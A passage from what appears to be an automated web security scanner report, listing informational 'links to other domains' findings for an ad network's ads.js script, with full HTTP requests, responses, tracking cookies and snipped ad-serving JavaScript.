NohGj7gGWDQ0O1tBjOUZ1X10to-JHx5UUQQ0XtSgyP9-pRtjKBA9CwxHOgIr_gZbPY3k0bg--U9ljw1q3jr96MmE73EdnErm3VtQTp-vphJrHygaBaOeith_F8SopLDsHqhmxtya7PjWj37arSozuBgqeZjp8etrKENXuiXvcnxOtam6O_IsnO4KqMVJJLJFDSB1wQojnNFJEVHJ1z2dK20EbWNc6m8qRp83LiQ18GX1WeBLRg0RBKOUwHwhiIhI6vYlDAmBKnXv1Fpf8CMCp7A3R8eW1vOx0sDf_Pg2Vk_EWg-3dTD9pFXajTYKOi3gdGMXkHYMSDJk5beZtUZNiQI8gP2AgMQPK76e63gI2hOWL2Ep1CAYYv3upE1fb8iIaMDvq8O5E7ddV0D5pFleY0M_uVIjbBBIbgr1jm6Fdm6TRz6ZxBfzt611SQRQv3TGdgGJCs-z7CWJAkkKm6QVjyzniKa2qmyLJBOs8NTGVmBHfXD5TumxA7PEEKID__3nlil_0MhemW32JW_NPA2PuMaV75RuOu_5zlMTmp1TZ5-IIzMuDF1_0mBYLE_jcsOigPlI7QMxsd0k9urfgfcUQTe5lNoZaZWq5BYNVwabYUPR3gChAX-5C0hUbM35mGHu1L4rJubbHfnWmOvaKAxmdzKR1yXa2qa0-xTnsTrJL3SjuDZ9-fxYQcEyL5UkQCnYXX03_6C3vZUgqL1ZnYm4I_njMSwYlYvV2g6TZT7vDkfIj-fJyXAXE341dpCMud6cedPrSXSPTfefQdM0tP2xoTvQ52Ln07PO5IUAcF9vr5H3GAXs_-7yBpssVFRYQr59E7HdjTfWYPAslTUhW2E-YuxF1FbHV_FU6Rem_8E1Csz4n-rOFLD0Y-V6t9vVViri1JPMkdk77iZWz50grATD8xTNk0-ttpVG8t4a3Iba5HVb_eDDGLyxa_0Ko4VQPJ6A5gDBt5kbFinAFixJ3IWUYzcoMk8sB5tjiTrQBlcf0NJzXpTja-ihhu1XF-9XhbnCXHvlFQ47YeJAWbQ2X-WjRVub53uydBonxyQvUNumZnfeOaFmzZlKlz8p7-_hIyW9RoB-H3tbotSN_C65ZNmsOHJYk5k3SR-ZGy0X-wTFcHGUhg88JtkH_1uEFTei8PnCizvB1uWFefJPRJgaL2pnfKOcF8wRXCTYK04DpArz-zLNxXeUzw_9tf3oxEBCW6nl0FJM5WBXKQ34N0lZKdhblcSKzBgN4X6JasxOnGHEmSMOVIHu3SNyD1AqnZ49Ec3Q__8vPE7h5F01m6n1yUfbYChHEmLBeQF_NSbWuoJH3l26X7K5i82oK2jzZTUOyfU2owAe4xf5Hl6tImgNB2JcS8jzwpwic9yIMEtC1MbYoTB2BsFsDwNSUC9iDyp6rjDUidnUlPRlNL-oCFz0fO78jHadnaghHetAf9Tp2HXGJI4awJ1PvXRlZGa5FveX0RDw1Yo9N74-luGLA0ZkTirQHakxKOnnEUnp_yj196o0sQyu3m_nk-h8uKyVtWOAEWD6gQvlrgUOeCD55G4L_2wfjZn9gcJEZ6K4YhOO0VCi4NoVVnsVZa3MksdqHD17rXSrLpAvfaEaEclc; Domain=.turn.com; Expires=Fri, 21-Oct-2011 16:13:00 GMT; Path=/
Set-Cookie: fc=zmuF1sAW39Yfq78BeHbK_qzfG8Iim-KOo0wyjG8eNFNzOQSYplWqfmVg5kiJcThQh_6Fy59RsfMGx2OPDA92rV7k3wz-hA_nvJsQ77ws1V62qLaXiXtLgqbyIAPknaGJF2Y3nF2sogXvl_T-_cXpoigesiGYW8faHJeyEdZb2TSAMF0jf9Pgr0Iy9TRYKUyQuY-vjiE5I-_rfxn3SNCLFA; Domain=.turn.com; Expires=Fri, 21-Oct-2011 16:13:00 GMT; Path=/
Set-Cookie: pf=N3U8NKDFVOjQiAfbeXebrRm2HEHLkBuljJwlJwX_KNMIHKIn0aMUCJnjty0nF6sdy3YNScPJBpPFFuHL0J---AiNvVCUgeP8UtXEbkd1ItLB8rw3HCsM6f9IpOSiQTFvJRKRbaQOui20s_9Bg4OdTngvxbAnhJ28PXFGVB1HyKBzy9fyoK7Wm9GhDtN3JSpoDSdgzvPz5efu6QjaGKhI5UwRUPHDfEOV3_7TnliI6U0x0lAZcaUvKKJ1QHmD_0YTw3USs_Efch8DyLQMqjj6C38-1lKIfX8YIpHRO4p--bGdMJBPDfs0jkNOV4KIC2xDdyNCEwJ23wuLt_MXDO1Z_IPhKl9BwPkNTah2lgQhjENI6H6e7r5GTuDHDKVwuDsSEg7X7QYS6UmUwbg2ikGtI0G3AaAZcVYD2Nt2uXf8ZtPeW6pgENIG8_w3xeZd6kK1sMs6I0SNDLzqnN7H1gbxbZdD0DY_lKb855iyP7fClP5XxONep4hNPzsxAJRJ1kou-ViOtsrp_bf27P9c5lUTyCQKcdzHjBck_b_B-UHMhYH6KLrjh5PX3m_XxZw53g56CxLowAXMELECGkbRM_oCpxhBhsTZW3iX4HdrzgpwAaQUck2p3bpVoUvhSSLXPCI9YtE-kyi_nTaX0IVqR-yakQI0mYYAhFFECfCHCg2SRYxq0S6M5I00QXLWYk2q3FJRFAkPpRwM27uiAj3Z4Fb61SVxTnK9m8UT7c0aPfZXb45oPleeGy8UXPpw6YYtnkYd_D_l2IAslLLyavszHjZBPa2iUWFiyom5hkFnxOuMWDkxYJXvwfLfmqZkXT0JHDrVc4TY00edyWQMXDx77_42FDNx_pd_cAxTF40mk5v5pYwWwImtJiseNAMcdxLAMVqLXSN0ML_WxcCtQ1Ci02yJaWGlL3V4Ng9ZefLRufU4NIErvMs-foQv1s-THrPJvkSFf_RbvZfjFZEbm5rhYFYobJEeNFTJ5qhmGU_V9TSYPraYX96uGtM_3pFVOdw-9XnKnQJPf1j2ATP8fxtG9wtsxg; Domain=.turn.com; Expires=Fri, 21-Oct-2011 16:13:00 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 16:12:59 GMT
Content-Length: 10043


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
DAGiWqtwpBMlqXzWHH4VX4kgZ93lH-yM4vQ%26client%3Dca-pub-6888065668292638%26adurl%3D/url/http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=brd&FlightID=2099675&Page=&PluID=0&Pos=9303" target="_blank"><img src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=bsr&FlightID=2099675&Page=&PluID=0&Pos=9303" border=0 width=160 height=600></a>
...[SNIP]...

23.43. http://ad.turn.com/server/ads.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /server/ads.js?pub=5622371&cch=5689307&code=5689677&l=160x600&aid=25615591&ahcid=781458&bimpd=0DJCOea7tQaPEXcsrHCGvbJ50l01mKSguUhbpQoeH0RWhqpfXKSPD0-MFPpVBPU10m7tT2_9tEc5CKS7Skz1aq9niBJoz6621irB3f190hXQBbsq7GRkM0K-RGUzu2oktl1sL4zS-2XTqCiC_CemeNW-SvPVZ9uvWN6QKCcGWsGWw_XUAnRIc08sAhMi6jaM3UfbSMqNBzxuuOzvFqY6BDkvQ6eUL3X8PfnSnaGsp-uk-XYrDlOOeRoBgVlRm5kMDlByLclETPpBR0VIG2dC6a9Q7FgriWjdrLAU7A9qPMdWscBjIiCiOms451jrCwDdtZPZ9Ju5iYKDVU3obChYLLzf464GptzhEx9p1rrX3KW3vX64t9pV4q8g0-D_Ww98PQ132Ppbuk7ijoUndfzz7rNfyLeQH5Gio5Do8v242vKJ6CYR718wQw9XuMOxHtEN8BBICX6F00yJ7PyUVTqmTQaJQmyFM1l4x-S8oOkTR0VUULXw7tpNDsCXeX5kiU7IRxgM2aC6JuWrx_7_5RQ2-cyT1LhRsTuEogXW-yxzh0vfOgMJJgzaqMcTcfaNoC7PX91mNtx9s8FQapZIbkQ1tO176w3mh_t7mVXDw8Rxd3gYR-TIJOv7LUxnRCA3B1881InA3TgJhUy39fsTN9KR4PAbDv3_uGCXV0Te9AyFL5Xt_T370WDWWY1SqEwEJwbhn-ZNI0MTk2TjTf5ElUcAOcWpSmQvUNv3Xnc2JdM3M-BA9y0FUzpqtDC0K6uSmpOagRBN5xins51mVi5acEHrzqo408BxR9uazB8jKSDnLvk&acp=TbRAMgAB9HgK5TqFIPdMcQuNKMEfW-AFpdRoCg&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBjpxiMkC0TfjoB4X1lAfxmN2HAsCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAmTAAgTIAuyT6QmoAwHoA7wB6AOUAvUDAAAAxIAGsue0ifi5i601%26num%3D1%26sig%3DAGiWqtwTOtDzQyQS0g4TnwrKdqolkBZqUg%26client%3Dca-pub-6888065668292638%26adurl%3D HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676549&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658549115&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303658549122&frm=1&adk=2614322350&ga_vid=574713569.1303658549&ga_sid=1303658549&ga_hid=1439411518&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=11
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=CMHOO7uf_udLLq9eGtJ3PdQJcQ_K22BQHXQ-dT6incxd6ISB_q_vS5rapRhLZ6kjvFBMD_r71JCvgjjawylbas-n3UVMoc2HfetiqdcGK7-MifLpV7fqak3Dns_efbQIZw0xnwcn-ju7SUW_27p2BuIIvMb-MRyDgs7z-nEGMqA; fc=NVeBshHSVnoUxhcixGrBhDuuhRKDd8vnh1xheKiYPKd3AL7Gx9Az1OHn7o3KNmBFGJEeoEGIaoMAXW2vTWlmm73wc-cQ7FRKnITKYzO3zYV52dhK4dSErN9-EcLOAtq0; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12; rds=15082%7C15082%7C15082%7C15088%7Cundefined%7C15082%7C15082%7Cundefined%7C15082%7C15082%7C15085%7C15085%7C15082%7C15085%7Cundefined%7C15085; rv=1; uid=2931142961646634775; pf=cKSJytWeDuTjEufRdCi4y8XcRCfZwFweqykUL2eo0UykdjY4nIpUBwhVZBThIPaF4B627JHWL3ahuj3A_UBrxpxKMUvxbd3f4Da9CFOTnTL5X3zgmC6OWXowKKoj5df4HRoJFl3mPlckn1wpclzDLQ7iVTPo6xLeW82rZAWcMMn-0ge5B6bX-Jw_BSdBMhaJRceopGJpc2YjAVLP6yBcU90N40phyJxywLIOGGEKSw8ZoVJuroHICj-FGi_cY7Rd52uo68R-HwHiqzs9rfgwUoBC0YF5sFftF8hFGep-tyiZF_0ohQEDeKLZrcUSOm6EjZzcmrNZG35Zw0ulgG_qswliy_Srlk4j3LntAATjDnn0h96ywTxXtonIC2ddFM5e

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Tue, 26 Apr 2011 15:30:18 GMT
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Fri, 21-Oct-2011 15:30:18 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=ddlU3HId5MaLRyayOAxOv6e1S4EpOzHJ9jWjO40aLKXDlGIUOWYS4TNj-1gj_Xcu77DtXuOsguLFXai3AhFvnLgBIMRhB2UOyXU1gHDwAID4Gsu4bgzX3HPXF8aZ-svzaho3UCU7Y1WfW1yv2EPwU0ywBbEJ4wtzflynm2A6q-pe3Cch1FBWqUhRXCeYz4jCon4LrJIKvPFN49pNuuU11hu8NfeyA_rS3BgELcsMsmBueA6joXijA3s4lagZ_Bmcz63pE4ozprgEO3FrlKYcQWnSvjM6YIyaPo076xrJcUOWfPVDM4ewql4E0qnTePubkBNn_TRBrw78HyPdexCRUXmxHZfc4p6eOVS-LVkk2KfBLeu5dFGcYKXhSdYOkpNX76c4pTy1x4tO_Sj_92V_c-Zd5gzh76DvpSEIud5bTmzBxQDH60wp7kWI6OtXwmsK8lCKtjWb8L9cUWaU-0UIo60LYKVlDBRhtDudy0aLm_tMNQF2iyMUjVL7ttzR-BfUM-tp89GxY2BjWUXIKPrRCs5cySrnTOh9dMxUw7WE-jbFzWA_8HGnuPTv5gj8D-oTVbRheWFalCX1wFIJaPC0u6477_djhhS3SPkBUOiwXvN_WwtT_ZKGSyDgXfkChQ0Mri-pvt5MhqWaQjjpMBxrbOSPaoBe4rX2OGkF6B5R5CKJoFEcgByN-Oi_xplHijt7D7k9QAhA1y9lElb1FxLMTWJMROkp2Xp7-HrCQ6npmBdcWuh9OwP5WPMPXscRpCIM-AxjFwSedJsA9duBIIoEH137K3Xedhve5L8S-WPAK15cs6-yUjStQuln63OD6AXuV4KgDOLc_1A4zE1C7F6UsGnSvjM6YIyaPo076xrJcUMGbKH33Mk3AAwHXX6IbEZeikZt4xeL6nraPEnFmjJxqM5LKwaW7Iwkg187TjopMcM05BucZOqIftlq19PLBiS676c4pTy1x4tO_Sj_92V_c98DRRkWusVt-Rux-hx66uC8mSFRnxnBUrSsMeG95GDw110qkc59lFVJvNpGPUP2wGndfgx95uzctKDelIPRbDBMNQF2iyMUjVL7ttzR-BfUd8a7ZlLpYgNqlOs9AM3Pas5cySrnTOh9dMxUw7WE-jZvFyIY8t_idDXE26ZOboPiYr1Cgt3jCTxEf1c1hGpvTa477_djhhS3SPkBUOiwXvOwqcR0Ec-KDppc0eGaONjEri-pvt5MhqWaQjjpMBxrbNZUSW4tD2VUhTWhRWU0h3yuPGM9W_Y4f-0-7YcinRzAUojhpX01rVy9-nj4jsvWlPVnIv-we7WrGXA10RMH6AFcWuh9OwP5WPMPXscRpCIMEZoZABCtvE0HnT-mxDiVVlnZKM_XJqTgUu_ZQzKn9FupDjfslrVyDxMBDlIppEJH3Wi1pcsBzL-a3IKmDdYDffz02zxgwih1t32hJDzR2iRH1xuEqF5DOIMy4KaraXc7adK-MzpgjJo-jTvrGslxQ970lXXKY1IvTeRRmXa7ij15xA_rvxJf0kdWomdIMrfwedEtnsFAncF6xSZD-ONiaGH_1ig58l32p_YrzpHC_DrvpzilPLXHi079KP_3ZX9zUcbIjjByU9n3_IlHTjKXIyf2BXQhSGVENGxgKqnojxrKV1B7NBMN8fr3nrJxtWo72xCVN_41MyrkEhrGbQ_r-Ew1AXaLIxSNUvu23NH4F9Q62Hc-eW6IaqN1LFSpkN26zlzJKudM6H10zFTDtYT6NssphFVz66kVO4sp3KHcbJzHb5BhyxmUX3VNl7WMXnrrrjvv92OGFLdI-QFQ6LBe84v3KLBrKgbQQ7FReWo9zyyuL6m-3kyGpZpCOOkwHGts7zs5zEeOZSTUu3-RSAG5SAhkRuulSpIxjTvGPkA2QGYPuT1ACEDXL2USVvUXEsxNr8F_iZZnVI2kVI3kaWBhdFxa6H07A_lY8w9exxGkIgwYLyQMK_xFsleORqJ6nP1RSUtLeguGIQ9odHomQReXE1JI7eQCKlb1D2RYtn4wmX-cOUcpPIvbDh06dGTnPu7CadK-MzpgjJo-jTvrGslxQ5uijGSE3qRQ5wNhEnVbHUsml822lIAWZilIfMj6Aa8Xj_Fvokk54_adFqvZFXeehnrUStPhVFMnK3sDBoZU3ci4v7aFu6WfkCEg9-gVQX8Q4cSdQOKBWDUzbKd_9Z6_1Q9fvn94HXXFFPok0XXz_lzz4kt5Z4ia2sPQIkWnZc70irWdCeM-u-vI54qVTRBQSgPcqV6Y2man6FmyrIe5Yq-TqvOLmhyJxn_95-Z3_1f0os_XT4LxOAvjvzeN7-AvJe56C8TwxqQRU4R3ZrbbaD-UGdqEtI70aFECTjCE5M1RilPlTvOohWo6nJDCKG3NLslXLmghzpDDtZAAuF74GHqupiYokZznsRUuLKgJVpmKZbouowwqHVMmrEyBFPkY8X3rm--dL65XS9oD2kwF5AOt8qstgohAf8ZUw1D1bd0hv8H0_48uwloDar3VjCslKxWORKByLcOyWFuEsAe2T7nI2aXNVpj67HiV0yaf3n4yvaeDCsb0KMkiKlSIhakrDSnztT8TxEK13ftDkrrak9tgTd-MadqkV_axJjulFCKDhCRxPmiaHG8XFoMFm_wewNzuhbHHeUxaHro4szgRs37uCyoZITKUs1r9JYlv6dUvAJXRAzuGt4_jw78coUpWP58PJgAKavnV1Ygb_aaj3uY-7whp_-ROyqCTu6Bem7IXgSYUVOL8eo28jjDNUrcNUauU5ux4Gt2oPfkh1SDRYgW_XLqylK2d4Mdni_Zee_BQMdRgthGGjLNFp3amfCQ5eMmMaW6KCBl-lALT_MGQS_6_-PWR_SW78XvouyFnXeeM6r0BygLRSLmbavA5Ih1oW8c-uWP19ocHjFMTQfjJxT4VqvQRD2MjZ2CYHvt7ShoeY2Kw5gJ4aLfcH--1rolKvePqjVSkPQsGU-d9vircOa2PpsZdtkiGmY8NgneYDBpvMlW-2YD1cANQZ5LMJSYeyp5W8pEbptOSVLP-z2McYexTn-7cbFm16LJUek0qEPMvu9DSYlG7N88nGH10r_u4V6EHM7XQyrIy4rzELj2HG6f73qX2cIDJ4gXxcSuSEZ2myTF9MtXwQjBZVDa4dkktRJ0abRN4ws4ErRCFL6jlrbHJqGU2HeJmO12wiihOOyABUwiBdSfIgMXkKoJqtSHj1LTUyHw9O7jL6GqialHpVZokgbtIV4ZO_rZ-C2ODUjwlBOu9dMDlXQU7TROY6FCc6MV3aBHD3wx1jbv8LvlJBPcXj9Y7s1YGS3SpC544G8XddMzRCPSLp3o175Iyj1lFbficvYTx19Qjior_eFO3rn87WKVQ7-ogenoy7Nz-VrVT_Y6OIA5Ts8Ru5abzil7lMSnT53Afi4YX8MQXoe-GCi5uodkRKarLT-5SijtoC441ndds8jaU8E7R7D39tpDeIYXJNs2WUZbb7pI8v5jP_m_Rc-RI68juRhJ1zX0KehJ56-bo6wFb5xB9JY_rsiwKc3cndErscnjsM7BSCKSQADscB5pf_pmv63dP8tDYn9UuqznQ1y7yBIf3npwbG99OcCmtGRUWkCFL1X6ngzaPRjXXztnVNXzpC79DJiqJCgml; Domain=.turn.com; Expires=Fri, 21-Oct-2011 15:30:18 GMT; Path=/
Set-Cookie: fc=qLH_PVqTymH1HU4O_j837yBVlgP3udUMuQ9NtmsqfxEjJU3u7yxMXk5wO5uqxHVXBtGK3PyNbIqcqC0usuk15axdMLn-DYTOi7o-kwGyn3_w19ePaOrvUodFzixpDIBOch24Vt5IwJJXFqONK8WZCvpZT2r-ImqIbIee7QyEpWA; Domain=.turn.com; Expires=Fri, 21-Oct-2011 15:30:18 GMT; Path=/
Set-Cookie: pf=SwcPTr2OtibMWVIKij4VkiZ3K2Aynzk4QwM6HUQpclcIHKIn0aMUCJnjty0nF6sdbclOGXPRI-4VrzHDg2TW0E8SQn_UBe0B2PMF8GuoieLB8rw3HCsM6f9IpOSiQTFvJRKRbaQOui20s_9Bg4OdTngvxbAnhJ28PXFGVB1HyKBzy9fyoK7Wm9GhDtN3JSpoDSdgzvPz5efu6QjaGKhI5UwRUPHDfEOV3_7TnliI6U0x0lAZcaUvKKJ1QHmD_0YTw3USs_Efch8DyLQMqjj6C38-1lKIfX8YIpHRO4p--bGdMJBPDfs0jkNOV4KIC2xDdyNCEwJ23wuLt_MXDO1Z_IPhKl9BwPkNTah2lgQhjENI6H6e7r5GTuDHDKVwuDsSEg7X7QYS6UmUwbg2ikGtI0G3AaAZcVYD2Nt2uXf8ZtPeW6pgENIG8_w3xeZd6kK1sMs6I0SNDLzqnN7H1gbxbZdD0DY_lKb855iyP7fClP5XxONep4hNPzsxAJRJ1kou-ViOtsrp_bf27P9c5lUTyCQKcdzHjBck_b_B-UHMhYH6KLrjh5PX3m_XxZw53g56CxLowAXMELECGkbRM_oCpxhBhsTZW3iX4HdrzgpwAaQUck2p3bpVoUvhSSLXPCI9YtE-kyi_nTaX0IVqR-yakQI0mYYAhFFECfCHCg2SRYxq0S6M5I00QXLWYk2q3FJRFAkPpRwM27uiAj3Z4Fb61SVxTnK9m8UT7c0aPfZXb45oPleeGy8UXPpw6YYtnkYd_D_l2IAslLLyavszHjZBPa2iUWFiyom5hkFnxOuMWDkxYJXvwfLfmqZkXT0JHDrVc4TY00edyWQMXDx77_42FDNx_pd_cAxTF40mk5v5pYwWwImtJiseNAMcdxLAMVqLXSN0ML_WxcCtQ1Ci02yJaWGlL3V4Ng9ZefLRufU4NIErvMs-foQv1s-THrPJvkSFf_RbvZfjFZEbm5rhYFYobJEeNFTJ5qhmGU_V9TSYPraYX96uGtM_3pFVOdw-9XnKnQJPf1j2ATP8fxtG9wtsxg; Domain=.turn.com; Expires=Fri, 21-Oct-2011 15:30:18 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 15:30:18 GMT
Content-Length: 10867


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
oncept.util.getRequestParameter;var FlashObject=deconcept.SWFObject;var SWFObject=deconcept.SWFObject;


document.write('\n\n\n    \n\n     \n    \n        \n        \n    \n\n\n\n\n\n\n        \n        \n        \n                \n                \n            \n                \n                <IFRAME SRC="http://ad.doubleclick.net/adi/N3285.turn/B2343920.7;sz=160x600;ord=8440323269241723068?;click=http://r.turn.com/r/tpclick/id/vNidbEsNInVOlAsABwIBAA/3c/http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBjpxiMkC0TfjoB4X1lAfxmN2HAsCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAmTAAgTIAuyT6QmoAwHoA7wB6AOUAvUDAAAAxIAGsue0ifi5i601%26num%3D1%26sig%3DAGiWqtwTOtDzQyQS0g4TnwrKdqolkBZqUg%26client%3Dca-pub-6888065668292638%26adurl%3D/url/;" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3285.turn/B2343920.7;abr=!ie;sz=160x600;ord=8440323269241723068?;click=http://r.turn.com/r/tpclick/id/vNidbEsNInVOlAsABwIBAA/3c/http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBjpxiMkC0TfjoB4X1lAfxmN2HAsCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAmTAAgTIAuyT6QmoAwHoA7wB6AOUAvUDAAAAxIAGsue0ifi5i601%26num%3D1%26sig%3DAGiWqtwTOtDzQyQS0g4TnwrKdqolkBZqUg%26client%3Dca-pub-6888065668292638%26adurl%3D/url/;">\n</SCRIPT>
...[SNIP]...
sig%3DAGiWqtwTOtDzQyQS0g4TnwrKdqolkBZqUg%26client%3Dca-pub-6888065668292638%26adurl%3D/url/http://ad.doubleclick.net/jump/N3285.turn/B2343920.7;abr=!ie4;abr=!ie5;sz=160x600;ord=8440323269241723068?">\n<IMG SRC="http://ad.doubleclick.net/ad/N3285.turn/B2343920.7;abr=!ie4;abr=!ie5;sz=160x600;ord=8440323269241723068?" BORDER=0 WIDTH=160 HEIGHT=600 ALT="Advertisement"></A>
...[SNIP]...

23.44. http://ad.turn.com/server/ads.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /server/ads.js?pub=5622371&cch=5689307&code=5689677&l=160x600&aid=25919926&ahcid=1089795&bimpd=AwUq_E6hLJos5E2vUu9cvm5XXQ3Gi9UxyWJGLPxIOdg3DKQL-6lWaDJU64H2wzEU7W2K64N2tBfHSl_Y8FFs6q9niBJoz6621irB3f190hXQBbsq7GRkM0K-RGUzu2oktl1sL4zS-2XTqCiC_CemeNW-SvPVZ9uvWN6QKCcGWsGWw_XUAnRIc08sAhMi6jaM3UfbSMqNBzxuuOzvFqY6BGRWooZCDwsmwTGoGkFOSS7rm-0eH79R-ZPf16jLVxwKlgHBzIj8H9loLjUdnhyPRbeOfpTS-1mTS87A111rNlAKvcwxugsSnr1idp-aByS3gU2xBm3QHaMdsIoCKhXuXyRKhKXGgpt9ON4nDHaJZDdO5Ic1Tm7zMwsmC67vFMlBtC8cnfVoc-ffY0bjr9ypPula_qJLrXcrZr4baiYl_ynMX-MZsvrLPipeckFJrph-KwPTremxOkOu-NAr5rfRwQaJQmyFM1l4x-S8oOkTR0WhneTrBKJPgkiiXrA82MwmMmAKf-fTCPDGWd8sW3YPelbYMfxTGLhmokb_LiHMdI07NjMOSxqJylcziAJzN-mGX91mNtx9s8FQapZIbkQ1tNBrIEGL6Qi9P13I5nx5nfqXWX5Skjm4gruJ9NdrOrBjoByWRKoQ3oF0AT_2N-Em_gjdkSW0JhvnWXPD46RI-8Pt_T370WDWWY1SqEwEJwbhnBOUR0uKXwLnlzhRcF-z1AMzSpd4HVsiSQfgdEzLWQlA9y0FUzpqtDC0K6uSmpOaAE0HQb-VqGycWmukn0nOb6o408BxR9uazB8jKSDnLvk&acp=TbRMUAAATmwK5TqGOphVbM7Q0PHrU_Bb0BEJ9A&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBtBH9UEy0TeycAYb1lAfsquHUA8CshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgC7JPpCagDAegDvAHoA5QC9QMAAADEgAbl8ongssKXiaIB%26num%3D1%26sig%3DAGiWqtxau1KJnQa24ScAaMD_bbFM6MNKyg%26client%3Dca-pub-6888065668292638%26adurl%3D HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679650&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661650965&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303661650971&frm=1&adk=2614322350&ga_vid=1627517092.1303661651&ga_sid=1303661651&ga_hid=784303803&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
